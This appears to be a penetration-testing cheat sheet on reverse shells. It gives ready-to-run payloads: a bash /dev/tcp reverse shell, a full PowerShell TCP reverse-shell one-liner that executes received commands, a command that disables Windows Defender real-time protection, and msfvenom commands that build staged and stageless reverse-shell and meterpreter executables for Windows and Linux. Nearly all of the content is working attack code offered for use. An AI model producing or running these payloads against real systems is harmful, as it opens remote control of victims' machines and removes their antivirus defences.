☠️ ζHUB

Reverse Shells

Created: Mar 01, 2025
Updated: Mar 23, 2025

Reverse shell is a type of shell where the attacker’s machine starts a listener, and the target machine is forced to initiate a connection back to the attacker, providing remote access.

These are the most commonly used shell payloads for remote access and command execution:

Bash

Bash (Bourne Again Shell) is a command-line shell and scripting language commonly used in Linux and macOS for automation, file management, and system administration.

/bin/bash -i >& /dev/tcp/$IP/4444 0>&1

Powershell

PowerShell is a Windows scripting language for automation and system management. Built on .NET Framework, it provides powerful tools for controlling and configuring Windows environments.

Link to original

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('$IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Disable AV

Windows Defender Antivirus (AV) may block the execution of payloads. However, you can disable it, but this requires administrative privileges.

# Disable Windows Defender Antivirus
Set-MpPreference -DisableRealtimeMonitoring $true

MSFvenom - Windows Reverse

MSFvenom is a command-line tool from Metasploit used to generate and encode payloads for exploits.

Link to original

# Stageless payloads - netcat listener
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=4444 -f exe -o stageless.exe
 
# Stageless payloads - msfconsole listener
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$IP LPORT=4444 -f exe -o stageless.exe
 
# Staged payloads - meterpreter shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=$IP LPORT=4444 -f exe -o staged.exe
 
# Staged payloads - cmd shell
msfvenom -p windows/x64/shell/reverse_tcp LHOST=$IP LPORT=4444 -f exe -o staged.exe
Link to original

MSFvenom - Linux Reverse

MSFvenom is a command-line tool from Metasploit used to generate and encode payloads for exploits.

Link to original

# Stageless payloads - netcat listener
msfvenom -p linux/x64/shell_reverse_tcp LHOST=$IP LPORT=4444 -f elf -o stageless
 
# Stageless payloads - msfconsole listener
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=$IP LPORT=4444 -f elf -o stageless
 
# Staged payloads - meterpreter shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=$IP LPORT=4444 -f elf -o staged
 
# Staged payloads - cmd shell
msfvenom -p linux/x64/shell/reverse_tcp LHOST=$IP LPORT=4444 -f elf -o staged
Link to original

Backlinks

  • No backlinks found